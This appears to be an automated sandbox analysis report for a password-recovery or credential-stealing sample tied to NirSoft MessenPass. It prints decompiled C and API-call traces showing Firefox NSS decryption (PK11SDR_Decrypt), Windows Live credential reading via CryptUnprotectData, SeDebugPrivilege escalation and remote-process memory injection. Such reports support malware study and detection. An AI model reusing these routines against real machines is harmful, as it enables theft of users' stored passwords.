                                • WriteProcessMemory.KERNEL32(00000000,00000000,?,0040428D,00000000), ref: 00404B55
                                • WriteProcessMemory.KERNEL32(00000000,?,Function_00004185,00000400,00000000,00000000), ref: 00404B76
                                • WriteProcessMemory.KERNEL32(00000000,0040428D,?,000000A0,00000000), ref: 00404B8C
                                • ResumeThread.KERNEL32(00000000,00000000,00000000,?,0040428D,0040428D), ref: 00404BB5
                                • WaitForSingleObject.KERNEL32(00000000,00003A98), ref: 00404BC1
                                • CloseHandle.KERNEL32(00000000), ref: 00404BC8
                                • memset.MSVCRT ref: 00404BE1
                                • ReadProcessMemory.KERNEL32(00000000,0040428D,?,000000A0,00000000), ref: 00404BFE
                                • ??2@YAPAXI@Z.MSVCRT ref: 00404C15
                                • ReadProcessMemory.KERNEL32(00000000,?,00000000,?,00000000), ref: 00404C2B
                                • ??3@YAXPAX@Z.MSVCRT ref: 00404C43
                                • FreeLibrary.KERNEL32(?), ref: 00404C51
                                • VirtualFreeEx.KERNEL32(00000000,0040428D,00000000,00008000), ref: 00404C6A
                                • VirtualFreeEx.KERNEL32(00000000,?,00000000,00008000), ref: 00404C74
                                • VirtualFreeEx.KERNEL32(00000000,?,00000000,00008000), ref: 00404C7E
                                • VirtualFreeEx.KERNEL32(00000000,?,00000000,00008000), ref: 00404C88
                                • CloseHandle.KERNEL32(00000000), ref: 00404C8D
                                Strings
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp
                                Similarity
                                • API ID: AddressProcVirtual$Handle$FreeProcess$Memory$AllocClose$ModuleWritememset$LibraryReadstrlen$??2@??3@DirectoryObjectOpenResumeSingleSystemThreadVersionWait_mbscpymemcpy
                                • String ID: GetModuleHandleA$GetProcAddress$LocalFree$WriteProcessMemory$kernel32.dll
                                • API String ID: 826043887-859290676
                                • Opcode ID: 1fb6d780cf3ea4d95bb3018ce0ead424245e3aea99e86965f213316376af9a78
                                • Instruction ID: 453227f2aabe0250eee1d40a9044243133179be0bc8eed6658bb11275d9bd618
                                • Opcode Fuzzy Hash: 1fb6d780cf3ea4d95bb3018ce0ead424245e3aea99e86965f213316376af9a78
                                • Instruction Fuzzy Hash: CA81F6B1901218BBDF21ABA1CC45EEFBF79EF88754F114066F604A2160D7395A81CFA9
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 100%
                                			E00407C79(signed int _a4) {
                                				char _v5;
                                				char _v6;
                                				char _v7;
                                				char _v8;
                                				char _v9;
                                				char _v10;
                                				char _v11;
                                				char _v12;
                                				char _v13;
                                				char _v14;
                                				char _v15;
                                				char _v16;
                                				char _v17;
                                				char _v18;
                                				char _v19;
                                				void _v20;
                                				long _v24;
                                				int _v28;
                                				int _v32;
                                				void* _v36;
                                				void _v291;
                                				char _v292;
                                				void _v547;
                                				char _v548;
                                				void _v1058;
                                				short _v1060;
                                				void _v1570;
                                				short _v1572;
                                				int _t88;
                                				signed int _t91;
                                				signed int _t92;
                                				signed int _t94;
                                				signed int _t96;
                                				signed int _t99;
                                				signed int _t104;
                                				signed short* _t110;
                                				void* _t113;
                                				void* _t114;
                                
                                				_t92 = 0;
                                				_v20 = 0xa3;
                                				_v19 = 0x1e;
                                				_v18 = 0xf3;
                                				_v17 = 0x69;
                                				_v16 = 7;
                                				_v15 = 0x62;
                                				_v14 = 0xd9;
                                				_v13 = 0x1f;
                                				_v12 = 0x1e;
                                				_v11 = 0xe9;
                                				_v10 = 0x35;
                                				_v9 = 0x7d;
                                				_v8 = 0x4f;
                                				_v7 = 0xd2;
                                				_v6 = 0x7d;
                                				_v5 = 0x48;
                                				_v292 = 0;
                                				memset( &_v291, 0, 0xff);
                                				_v548 = 0;
                                				memset( &_v547, 0, 0xff);
                                				_v1572 = 0;
                                				memset( &_v1570, 0, 0x1fe);
                                				_v1060 = 0;
                                				memset( &_v1058, 0, 0x1fe);
                                				_v36 = _a4 + 4;
                                				_a4 = 0;
                                				_v24 = 0xff;
                                				GetComputerNameA( &_v292,  &_v24);
                                				_v24 = 0xff;
                                				GetUserNameA( &_v548,  &_v24); // executed
                                				MultiByteToWideChar(0, 0,  &_v292, 0xffffffff,  &_v1572, 0xff);
                                				MultiByteToWideChar(0, 0,  &_v548, 0xffffffff,  &_v1060, 0xff);
                                				_v32 = strlen( &_v292);
                                				_t88 = strlen( &_v548);
                                				_t113 = _v36;
                                				_v28 = _t88;
                                				memcpy(_t113,  &_v20, 0x10);
                                				_t91 = 0xba0da71d;
                                				if(_v28 > 0) {
                                					_t110 =  &_v1060;
                                					do {
                                						_t104 = _a4 & 0x80000003;
                                						if(_t104 < 0) {
                                							_t104 = (_t104 - 0x00000001 | 0xfffffffc) + 1;
                                						}
                                						_t96 = ( *_t110 & 0x0000ffff) * _t91;
                                						_t91 = _t91 * 0xbc8f;
                                						 *(_t113 + _t104 * 4) =  *(_t113 + _t104 * 4) ^ _t96;
                                						_a4 = _a4 + 1;
                                						_t110 =  &(_t110[1]);
                                					} while (_a4 < _v28);
                                				}
                                				if(_v32 > _t92) {
                                					do {
                                						_t99 = _a4 & 0x80000003;
                                						if(_t99 < 0) {
                                							_t99 = (_t99 - 0x00000001 | 0xfffffffc) + 1;
                                						}
                                						_t94 = ( *(_t114 + _t92 * 2 - 0x620) & 0x0000ffff) * _t91;
                                						_t91 = _t91 * 0xbc8f;
                                						 *(_t113 + _t99 * 4) =  *(_t113 + _t99 * 4) ^ _t94;
                                						_a4 = _a4 + 1;
                                						_t92 = _t92 + 1;
                                					} while (_t92 < _v32);
                                				}
                                				return _t91;
                                			}

                                APIs
                                • memset.MSVCRT ref: 00407CDB
                                • memset.MSVCRT ref: 00407CEF
                                • memset.MSVCRT ref: 00407D09
                                • memset.MSVCRT ref: 00407D1E
                                • GetComputerNameA.KERNEL32(?,?), ref: 00407D40
                                • GetUserNameA.ADVAPI32(?,?), ref: 00407D54
                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 00407D73
                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 00407D88
                                • strlen.MSVCRT ref: 00407D91
                                • strlen.MSVCRT ref: 00407DA0
                                • memcpy.MSVCRT ref: 00407DB2
                                Strings
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp
                                Similarity
                                • API ID: memset$ByteCharMultiNameWidestrlen$ComputerUsermemcpy
                                • String ID: 5$H$O$b$i$}$}
                                • API String ID: 1832431107-3760989150
                                • Opcode ID: fa53add491d98d1486bc50851db0f2d2053b3cdea30a1b6f38a2d4001a04f200
                                • Instruction ID: c5d11ab3608301e1d6334a6842c6e335c593dc938f6648a4795a3d5a3f6caa6c
                                • Opcode Fuzzy Hash: fa53add491d98d1486bc50851db0f2d2053b3cdea30a1b6f38a2d4001a04f200
                                • Instruction Fuzzy Hash: 0951D671C0025DFEDB11CFA4CC81AEEBBBCEF49314F0481AAE555A6181D3389B85CBA5
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • GetCurrentProcess.KERNEL32(00000028,?), ref: 00410DF0
                                  • Part of subcall function 00410DAA: GetProcAddress.KERNEL32(00000000,OpenProcessToken), ref: 00410DC0
                                • GetLastError.KERNEL32(00000000), ref: 00410E02
                                • GetProcAddress.KERNEL32(?,LookupPrivilegeValueA), ref: 00410E24
                                • LookupPrivilegeValueA.ADVAPI32(00000000,SeDebugPrivilege,?,?,LookupPrivilegeValueA,?,?,00000000), ref: 00410E34
                                • GetProcAddress.KERNEL32(?,AdjustTokenPrivileges), ref: 00410E5A
                                • AdjustTokenPrivileges.KERNELBASE(?,00000000,00000001,00000000,00000000,00000000,?,AdjustTokenPrivileges,?,?,00000000), ref: 00410E6B
                                • FindCloseChangeNotification.KERNELBASE(?,?,?,00000000), ref: 00410E78
                                Strings
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp
                                Similarity
                                • API ID: AddressProc$AdjustChangeCloseCurrentErrorFindLastLookupNotificationPrivilegePrivilegesProcessTokenValue
                                • String ID: AdjustTokenPrivileges$LookupPrivilegeValueA$SeDebugPrivilege
                                • API String ID: 2949824235-164648368
                                • Opcode ID: bcfb295028deb42d7034a1c1e26edc5f6458782d310d68dd3fa971f052d55e9a
                                • Instruction ID: 180035a187f8386c87a779d0175683d60653c8262eee481a5a772ffe12dd7b09
                                • Opcode Fuzzy Hash: bcfb295028deb42d7034a1c1e26edc5f6458782d310d68dd3fa971f052d55e9a
                                • Instruction Fuzzy Hash: D2117371900205FBDB11ABE5DC85AEF7BBCEB48344F10442AF501E2151DBB99DC18BA9
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 100%
                                			E00407898(void** __eax) {
                                				void* __esi;
                                				void* _t15;
                                				int _t16;
                                				int _t17;
                                				void* _t26;
                                				void** _t38;
                                				void** _t40;
                                				void* _t45;
                                
                                				_t40 = __eax;
                                				_t15 =  *__eax;
                                				if(_t15 != 0xffffffff) {
                                					_t6 =  &(_t40[0x52]); // 0x247
                                					_t16 = FindNextFileA(_t15, _t6); // executed
                                					 *(_t45 + 4) = _t16;
                                					if(_t16 != 0) {
                                						goto L5;
                                					} else {
                                						E00407930(_t40);
                                						goto L4;
                                					}
                                				} else {
                                					_t1 =  &(_t40[0x52]); // 0x247
                                					_t2 =  &(_t40[1]); // 0x103
                                					_t26 = FindFirstFileA(_t2, _t1); // executed
                                					 *_t40 = _t26;
                                					 *(_t45 + 4) = 0 | _t26 != 0xffffffff;
                                					L4:
                                					if( *(_t45 + 4) != 0) {
                                						L5:
                                						_t9 =  &(_t40[0xa2]); // 0x387
                                						_t38 = _t9;
                                						_t10 =  &(_t40[0x5d]); // 0x273
                                						_t28 = _t10;
                                						_t41 =  &(_t40[0xf3]);
                                						_t17 = strlen( &(_t40[0xf3]));
                                						if(strlen(_t10) + _t17 + 1 >= 0x143) {
                                							 *_t38 = 0;
                                						} else {
                                							E00406B4B(_t38, _t41, _t28);
                                						}
                                					}
                                				}
                                				return  *(_t45 + 4);
                                			}

                                APIs
                                • FindFirstFileA.KERNELBASE(00000103,00000247,?,?,004042EE,?), ref: 004078AE
                                • FindNextFileA.KERNELBASE(000000FF,00000247,?,?,004042EE,?), ref: 004078CC
                                • strlen.MSVCRT ref: 004078FC
                                • strlen.MSVCRT ref: 00407904
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp
                                Similarity
                                • API ID: FileFindstrlen$FirstNext
                                • String ID:
                                • API String ID: 379999529-0
                                • Opcode ID: 2b827dd507cf4954e4e0e3644904d3df78e65a6b3ddb2711f2897f60a4f4153f
                                • Instruction ID: 3f72f9a190aab30f8f483bccc0fafde7a86c3084d5e1b238a9c8f95d2c3e0c3c
                                • Opcode Fuzzy Hash: 2b827dd507cf4954e4e0e3644904d3df78e65a6b3ddb2711f2897f60a4f4153f
                                • Instruction Fuzzy Hash: 1F1186B2919201AFD3149B34D884EDB77D8DF44325F20493FF19AD21D0EB38B9459755
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 64%
                                			E0040C66A(void* __ecx, void* __eflags) {
                                				void* __ebx;
                                				void* __edi;
                                				void* __esi;
                                				void* _t56;
                                				struct HINSTANCE__* _t59;
                                				void* _t61;
                                				void* _t65;
                                				void* _t67;
                                				void* _t73;
                                				void* _t83;
                                				void* _t86;
                                				void* _t88;
                                				intOrPtr _t89;
                                				void* _t91;
                                				void* _t96;
                                				void* _t97;
                                				void* _t111;
                                				struct HWND__* _t112;
                                				intOrPtr* _t123;
                                				void* _t124;
                                				void* _t126;
                                
                                				_t124 = _t126 - 0x68;
                                				 *0x41dbd4 =  *(_t124 + 0x70);
                                				_t56 = E00404D7A(__ecx);
                                				if(_t56 != 0) {
                                					0x412192(_t111);
                                					_t112 = 0;
                                					 *(_t124 + 0x70) = 0;
                                					0x410de1(); // executed
                                					__eflags =  *(_t124 + 0x70);
                                					if( *(_t124 + 0x70) != 0) {
                                						FreeLibrary( *(_t124 + 0x70));
                                					}
                                					 *0x41e150 = 0x11223344; // executed
                                					EnumResourceTypesA( *0x41dbd4, 0x412111, _t112);
                                					_t59 =  *0x41e150; // 0xe17b5ca0
                                					__eflags = _t59 - 0xe17b5ca0;
                                					 *(_t124 + 0x70) = _t59;
                                					if(_t59 == 0xe17b5ca0) {
                                						_t61 = E0040731C(_t124 + 0x34);
                                						 *((intOrPtr*)(_t124 + 0x5c)) = 0x20;
                                						 *(_t124 + 0x54) = _t112;
                                						 *(_t124 + 0x60) = _t112;
                                						 *(_t124 + 0x58) = _t112;
                                						 *(_t124 + 0x64) = _t112;
                                						E0040C427(_t61, _t124 - 0x384);
                                						 *((intOrPtr*)(_t124 + 0x14)) = _t124 + 0x34;
                                						E0040763D(__eflags, _t124 + 0x34,  *((intOrPtr*)(_t124 + 0x78)));
                                						_t65 = E004077AF( *((intOrPtr*)(_t124 + 0x14)), "/savelangfile", 0xffffffff);
                                						__eflags = _t65;
                                						if(_t65 < 0) {
                                							E0040902B(); // executed
                                							_t67 = E004077AF( *((intOrPtr*)(_t124 + 0x14)), "/deleteregkey", 0xffffffff);
                                							__eflags = _t67;
                                							if(_t67 < 0) {
                                								__eflags =  *(_t124 + 0x70) + 0x1e84a361 - 1;
                                								if( *(_t124 + 0x70) + 0x1e84a361 != 1) {
                                									L28:
                                									 *((intOrPtr*)(_t124 - 0x384)) = 0x418778;
                                									0x413d56( *((intOrPtr*)(_t124 + 8)));
                                									__eflags =  *(_t124 + 4) - _t112;
                                									if( *(_t124 + 4) != _t112) {
                                										DeleteObject( *(_t124 + 4));
                                										 *(_t124 + 4) = _t112;
                                									}
                                									L30:
                                									 *((intOrPtr*)(_t124 - 0x384)) = 0x417d40;
                                									E0040733E(_t124 + 0x34);
                                									E00407A7A(_t124 + 0x54);
                                									E0040733E(_t124 + 0x34);
                                									L31:
                                									_t73 = 0;
                                									__eflags = 0;
                                									goto L32;
                                								}
                                								__eflags =  *((intOrPtr*)( *((intOrPtr*)(_t124 + 0x14)) + 0x30)) - 1;
                                								if(__eflags <= 0) {
                                									L16:
                                									 *0x415394(_t112);
                                									E0040C3AF(_t124 - 0x384);
                                									__eflags =  *((intOrPtr*)(_t124 - 0x238)) - 3;
                                									if( *((intOrPtr*)(_t124 - 0x238)) != 3) {
                                										_push(5);
                                									} else {
                                										_push(3);
                                									}
                                									ShowWindow( *(_t124 - 0x27c), ??);
                                									UpdateWindow( *(_t124 - 0x27c));
                                									 *((intOrPtr*)(_t124 - 0x264)) = LoadAcceleratorsA( *0x41dbd4, 0x67);
                                									PostMessageA( *(_t124 - 0x27c), 0x415, _t112, _t112);
                                									_t83 = GetMessageA(_t124 + 0x18, _t112, _t112, _t112);
                                									__eflags = _t83;
                                									if(_t83 == 0) {
                                										L27:
                                										 *0x415398();
                                										goto L28;
                                									} else {
                                										_t123 =  *0x415184;
                                										do {
                                											_t86 =  *0x415208( *(_t124 - 0x27c),  *((intOrPtr*)(_t124 - 0x264)), _t124 + 0x18);
                                											__eflags = _t86;
                                											if(_t86 != 0) {
                                												goto L26;
                                											}
                                											_t89 =  *0x41e1f4; // 0x0
                                											__eflags = _t89 - _t112;
                                											if(_t89 == _t112) {
                                												L24:
                                												_t91 =  *_t123( *(_t124 - 0x27c), _t124 + 0x18);
                                												__eflags = _t91;
                                												if(_t91 == 0) {
                                													TranslateMessage(_t124 + 0x18);
                                													DispatchMessageA(_t124 + 0x18);
                                												}
                                												goto L26;
                                											}
                                											_t96 =  *_t123(_t89, _t124 + 0x18);
                                											__eflags = _t96;
                                											if(_t96 != 0) {
                                												goto L26;
                                											}
                                											goto L24;
                                											L26:
                                											_t88 = GetMessageA(_t124 + 0x18, _t112, _t112, _t112);
                                											__eflags = _t88;
                                										} while (_t88 != 0);
                                										goto L27;
                                									}
                                								}
                                								_t97 = E0040C5A4(_t124 - 0x384, __eflags);
                                								__eflags = _t97;
                                								if(_t97 == 0) {
                                									_t112 = 0;
                                									__eflags = 0;
                                									goto L16;
                                								}
                                								 *((intOrPtr*)(_t124 - 0x384)) = 0x418778;
                                								0x413d56( *((intOrPtr*)(_t124 + 8)));
                                								__eflags =  *(_t124 + 4);
                                								if( *(_t124 + 4) != 0) {
                                									DeleteObject( *(_t124 + 4));
                                									 *(_t124 + 4) =  *(_t124 + 4) & 0x00000000;
                                								}
                                								goto L30;
                                							}
                                							RegDeleteKeyA(0x80000001, "Software\NirSoft\MessenPass");
                                							goto L28;
                                						}
                                						 *0x41e390 = 0x41db18;
                                						E00409167();
                                						goto L28;
                                					}
                                					MessageBoxA(_t112, "Failed to load the executable file !", "Error", 0x30);
                                					goto L31;
                                				} else {
                                					_t73 = _t56 + 1;
                                					L32:
                                					return _t73;
                                				}
                                			}

                                APIs
                                  • Part of subcall function 00404D7A: LoadLibraryA.KERNEL32(comctl32.dll), ref: 00404D99
                                  • Part of subcall function 00404D7A: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00404DAB
                                  • Part of subcall function 00404D7A: FreeLibrary.KERNEL32(00000000), ref: 00404DBF
                                  • Part of subcall function 00404D7A: MessageBoxA.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404DEA
                                • FreeLibrary.KERNEL32(?), ref: 0040C6A7
                                • EnumResourceTypesA.KERNEL32(00412111,00000000), ref: 0040C6C3
                                • MessageBoxA.USER32(00000000,Failed to load the executable file !,Error,00000030), ref: 0040C6E5
                                Strings
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp
                                Similarity
                                • API ID: Library$FreeMessage$AddressEnumLoadProcResourceTypes
                                • String ID: /deleteregkey$/savelangfile$Error$Failed to load the executable file !$Software\NirSoft\MessenPass$f-@
                                • API String ID: 1343656639-3807849023
                                • Opcode ID: 963b88b9f9c69f281e14da51def9a8da2922e77b5a2540e53fd8c7e58f6c6b2e
                                • Instruction ID: c9cf7fae9a68988a057e6d0076c0e2abe6ed6f3ff992c821ff985c928f871611
                                • Opcode Fuzzy Hash: 963b88b9f9c69f281e14da51def9a8da2922e77b5a2540e53fd8c7e58f6c6b2e
                                • Instruction Fuzzy Hash: 7661917190420AEBDF21AF61DD89ADE3BB8BF84305F10817BF905A21A0DB389945DF5D
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 37%
                                			E00405EC5(CHAR* _a4) {
                                				void* _v8;
                                				int _v12;
                                				void _v267;
                                				char _v268;
                                				void _v531;
                                				char _v532;
                                				void _v787;
                                				char _v788;
                                				void _v1051;
                                				char _v1052;
                                				void _v2075;
                                				char _v2076;
                                				void** _t44;
                                				void* _t49;
                                				void* _t51;
                                				char* _t54;
                                				char* _t55;
                                				char* _t63;
                                				char* _t67;
                                				CHAR* _t79;
                                				void* _t82;
                                				void* _t83;
                                				void* _t84;
                                				void* _t85;
                                
                                				_v1052 = 0;
                                				memset( &_v1051, 0, 0x104);
                                				_v788 = 0;
                                				memset( &_v787, 0, 0xff);
                                				_t79 = _a4;
                                				_t44 =  &_v8;
                                				 *_t79 = 0;
                                				0x411d68(0x80000002, "SOFTWARE\Mozilla", _t44);
                                				_t83 = _t82 + 0x24;
                                				if(_t44 != 0) {
                                					L13:
                                					0x413d0c(_t79,  &_v1052);
                                					if( *_t79 == 0) {
                                						ExpandEnvironmentStringsA("%programfiles%\Mozilla Firefox", _t79, 0x104);
                                						_t49 = E00405E4A(_t79); // executed
                                						if(_t49 == 0) {
                                							 *_t79 = 0;
                                						}
                                						if( *_t79 == 0) {
                                							GetCurrentDirectoryA(0x104, _t79);
                                							_t51 = E00405E4A(_t79); // executed
                                							if(_t51 == 0) {
                                								 *_t79 = 0;
                                							}
                                						}
                                					}
                                					return 0 |  *_t79 != 0x00000000;
                                				} else {
                                					_v268 = 0;
                                					memset( &_v267, 0, 0xff);
                                					_t54 =  &_v268;
                                					_v12 = 0;
                                					0x411dee(_v8, 0, _t54);
                                					_t84 = _t83 + 0x18;
                                					while(_t54 == 0) {
                                						_t55 =  &_v268;
                                						0x413daa(_t55, "mozilla", 7);
                                						_t85 = _t84 + 0xc;
                                						if(_t55 != 0) {
                                							L10:
                                							_v12 = _v12 + 1;
                                							_t54 =  &_v268;
                                							0x411dee(_v8, _v12, _t54);
                                							_t84 = _t85 + 0xc;
                                							continue;
                                						}
                                						_v532 = 0;
                                						memset( &_v531, 0, 0x104);
                                						_v2076 = 0;
                                						memset( &_v2075, 0, 0x3ff);
                                						0x413d9e( &_v2076, 0x3ff, "%s\bin",  &_v268);
                                						0x411dae(_v8,  &_v2076, "PathToExe", 0x104);
                                						_t63 =  &_v532;
                                						0x413da4(_t63, 0x5c);
                                						_t85 = _t85 + 0x40;
                                						if(_t63 != 0) {
                                							 *_t63 = 0;
                                						}
                                						if(_v532 != 0 && E00405E4A( &_v532) != 0) {
                                							_t67 =  &_v268;
                                							0x413d74(_t67,  &_v788);
                                							if(_t67 > 0) {
                                								0x413d0c( &_v1052,  &_v532);
                                								0x413d0c( &_v788,  &_v268);
                                								_t85 = _t85 + 0x10;
                                							}
                                						}
                                						_t79 = _a4;
                                						goto L10;
                                					}
                                					RegCloseKey(_v8);
                                					goto L13;
                                				}
                                			}

                                APIs
                                • memset.MSVCRT ref: 00405EE7
                                • memset.MSVCRT ref: 00405EFF
                                  • Part of subcall function 00411D68: RegOpenKeyExA.KERNELBASE(80000001,80000001,00000000,00020019,80000001,00402850,80000001,Software\AIM\AIMPRO,?), ref: 00411D7B
                                • memset.MSVCRT ref: 00405F3A
                                  • Part of subcall function 00411DEE: RegEnumKeyExA.ADVAPI32(?,000000FF,000000FF,?,00000000,00000000,00000000,000000FF,000000FF), ref: 00411E11
                                • _mbsnbicmp.MSVCRT ref: 00405F68
                                • memset.MSVCRT ref: 00405F87
                                • memset.MSVCRT ref: 00405FA0
                                • _snprintf.MSVCRT ref: 00405FB9
                                • _mbsrchr.MSVCRT ref: 00405FDE
                                • _mbsicmp.MSVCRT ref: 00406012
                                • _mbscpy.MSVCRT ref: 0040602B
                                • _mbscpy.MSVCRT ref: 0040603E
                                • RegCloseKey.ADVAPI32(?), ref: 0040606C
                                • _mbscpy.MSVCRT ref: 0040607A
                                • ExpandEnvironmentStringsA.KERNEL32(%programfiles%\Mozilla Firefox,?,00000104), ref: 0040608C
                                • GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 004060A4
                                Strings
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp
                                Similarity
                                • API ID: memset$_mbscpy$CloseCurrentDirectoryEnumEnvironmentExpandOpenStrings_mbsicmp_mbsnbicmp_mbsrchr_snprintf
                                • String ID: %programfiles%\Mozilla Firefox$%s\bin$PathToExe$SOFTWARE\Mozilla$mozilla
                                • API String ID: 201549630-2797892316
                                • Opcode ID: 143d9ff20e20033ed1fcd052ac8b55e33d1b5df0c5c94a0e96d74893e0675214
                                • Instruction ID: a9db27f8d3bb6867008f3f8c7ab71477537d255c6bc9b4b6a3b98ebc98dd088a
                                • Opcode Fuzzy Hash: 143d9ff20e20033ed1fcd052ac8b55e33d1b5df0c5c94a0e96d74893e0675214
                                • Instruction Fuzzy Hash: 8F51B7B184015DBADB21DB619C86EDF7BBC9F15304F0004FAB548E2142EA789FC58BA5
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • memset.MSVCRT ref: 00410C6D
                                  • Part of subcall function 00405EC5: memset.MSVCRT ref: 00405EE7
                                  • Part of subcall function 00405EC5: memset.MSVCRT ref: 00405EFF
                                  • Part of subcall function 00405EC5: memset.MSVCRT ref: 00405F3A
                                  • Part of subcall function 00405EC5: RegCloseKey.ADVAPI32(?), ref: 0040606C
                                  • Part of subcall function 00405EC5: _mbscpy.MSVCRT ref: 0040607A
                                  • Part of subcall function 00405EC5: ExpandEnvironmentStringsA.KERNEL32(%programfiles%\Mozilla Firefox,?,00000104), ref: 0040608C
                                  • Part of subcall function 00405EC5: GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 004060A4
                                • GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 00410C92
                                • SetCurrentDirectoryA.KERNEL32(?), ref: 00410C9F
                                • memset.MSVCRT ref: 00410CB4
                                • strlen.MSVCRT ref: 00410CBE
                                • strlen.MSVCRT ref: 00410CCC
                                • LoadLibraryExA.KERNEL32(?,00000000,00000008), ref: 00410D0B
                                • GetProcAddress.KERNEL32(00000000,NSS_Init), ref: 00410D23
                                • GetProcAddress.KERNEL32(?,NSS_Shutdown), ref: 00410D2F
                                • GetProcAddress.KERNEL32(?,PK11_GetInternalKeySlot), ref: 00410D3B
                                • GetProcAddress.KERNEL32(?,PK11_FreeSlot), ref: 00410D47
                                • GetProcAddress.KERNEL32(?,PK11_Authenticate), ref: 00410D53
                                • GetProcAddress.KERNEL32(?,PK11SDR_Decrypt), ref: 00410D5F
                                  • Part of subcall function 00406B4B: _mbscpy.MSVCRT ref: 00406B53
                                  • Part of subcall function 00406B4B: _mbscat.MSVCRT ref: 00406B62
                                Strings
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp
                                Similarity
                                • API ID: AddressProc$memset$CurrentDirectory$_mbscpystrlen$CloseEnvironmentExpandLibraryLoadStrings_mbscat
                                • String ID: NSS_Init$NSS_Shutdown$PK11SDR_Decrypt$PK11_Authenticate$PK11_FreeSlot$PK11_GetInternalKeySlot$nss3.dll
                                • API String ID: 2719586705-3659000792
                                • Opcode ID: 75917a1aec9986030c83e97f8a6c26f5c534c2a98396f13b9efaf1f70b8442b1
                                • Instruction ID: 3c436980af1a21df5e4856e841a29f4fe06fda5e66834ce9295461a77701cb90
                                • Opcode Fuzzy Hash: 75917a1aec9986030c83e97f8a6c26f5c534c2a98396f13b9efaf1f70b8442b1
                                • Instruction Fuzzy Hash: BB317671940308AFCB20EFB5DC89ECABBB8AF64704F10486EE185D3141DAB996C48F54
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • LoadLibraryA.KERNELBASE(psapi.dll,?,00411155,00404495,00000000,00000000,00000000), ref: 004110C2
                                • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameA), ref: 004110DB
                                • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004110EC
                                • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExA), ref: 004110FD
                                • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 0041110E
                                • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 0041111F
                                • FreeLibrary.KERNEL32(00000000), ref: 0041113F
                                Strings
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp
                                Similarity
                                • API ID: AddressProc$Library$FreeLoad
                                • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameA$GetModuleFileNameExA$GetModuleInformation$psapi.dll
                                • API String ID: 2449869053-232097475
                                • Opcode ID: ee84c210bc0f50ddd9e1354071252ba1724dd235f625d6dd127ec76221b6c85c
                                • Instruction ID: 150d9d7abe9eb73bde655d9ea944b9d4c8ac0ad9fe74c99b0592c1ab8213f4a8
                                • Opcode Fuzzy Hash: ee84c210bc0f50ddd9e1354071252ba1724dd235f625d6dd127ec76221b6c85c
                                • Instruction Fuzzy Hash: CA01B138941212FAC7209F26AD04BE77EE4578CB94F14803BEA04D1669EB7884828A6C
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • RegOpenKeyExA.KERNELBASE(80000001,Software\Microsoft\IdentityCRL,00000000,00020019,?,?,75D6F420,00000000,?,0040DCC1,?), ref: 0041041E
                                • RegOpenKeyExA.KERNELBASE(?,Dynamic Salt,00000000,00020019,?,?,75D6F420,00000000,?,0040DCC1,?), ref: 00410436
                                • RegQueryValueExA.ADVAPI32(?,Value,00000000,?,?,?,?,75D6F420,00000000,?,0040DCC1), ref: 0041045F
                                • RegCloseKey.ADVAPI32(?,?,75D6F420,00000000,?,0040DCC1), ref: 00410509
                                  • Part of subcall function 00404C9D: LoadLibraryA.KERNELBASE(crypt32.dll,00000000,00404771,?,?), ref: 00404CAA
                                  • Part of subcall function 00404C9D: GetProcAddress.KERNEL32(00000000,CryptUnprotectData), ref: 00404CBC
                                • memcpy.MSVCRT ref: 004104C8
                                • memcpy.MSVCRT ref: 004104DD
                                  • Part of subcall function 004100A4: RegOpenKeyExA.ADVAPI32(004104FD,Creds,00000000,00020019,004104FD,00000040,%GKP$^%^&LL(%^$^O&TR$^%^GV6;lxzd,?,?,004104FD,?,?,?,?), ref: 004100C8
                                  • Part of subcall function 004100A4: memset.MSVCRT ref: 004100EA
                                  • Part of subcall function 004100A4: RegEnumKeyA.ADVAPI32(?,00000000,?,000000FF), ref: 004101E7
